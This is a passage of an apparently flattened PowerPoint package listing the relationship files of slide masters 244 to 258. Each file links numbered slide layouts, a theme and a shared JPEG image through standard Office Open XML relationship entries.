Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2432.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme244.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2440.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2431.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster245.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2449.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2448.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2447.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2446.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2445.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2444.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2443.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2442.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme245.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2450.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2441.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster246.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2459.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2458.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2457.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2456.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2455.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2454.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2453.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2452.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme246.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2460.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2451.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster247.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2469.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2468.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2467.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2466.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2465.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2464.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2463.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2462.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme247.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2470.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2461.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster248.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2479.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2478.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2477.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2476.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2475.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2474.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2473.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2472.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme248.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2480.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2471.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster249.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2489.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2488.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2487.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2486.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2485.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2484.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2483.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2482.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme249.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2490.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2481.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster25.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout249.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout248.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout247.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout246.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout245.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout244.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout243.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout242.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme25.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout250.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout241.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster250.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2499.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2498.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2497.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2496.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2495.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2494.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2493.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2492.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme250.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2500.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2491.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster251.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2509.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2508.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2507.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2506.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2505.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2504.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2503.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2502.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme251.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2510.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2501.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster252.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2519.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2518.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2517.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2516.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2515.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2514.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2513.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2512.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme252.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2520.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2511.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster253.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2529.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2528.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2527.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2526.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2525.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2524.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2523.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2522.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme253.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2530.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2521.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster254.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2539.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2538.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2537.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2536.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2535.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2534.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2533.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2532.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme254.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2540.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2531.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster255.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2549.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2548.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2547.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2546.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2545.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2544.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2543.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2542.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme255.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2550.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2541.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster256.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2559.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2558.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2557.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2556.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2555.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2554.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2553.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2552.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme256.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2560.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2551.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster257.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2569.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2568.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2567.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2566.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2565.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2564.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2563.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2562.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme257.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2570.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2561.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster258.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2579.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2578.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2577.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2576.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2575.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2574.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2573.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2572.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme258.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2580.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2571.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster259.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
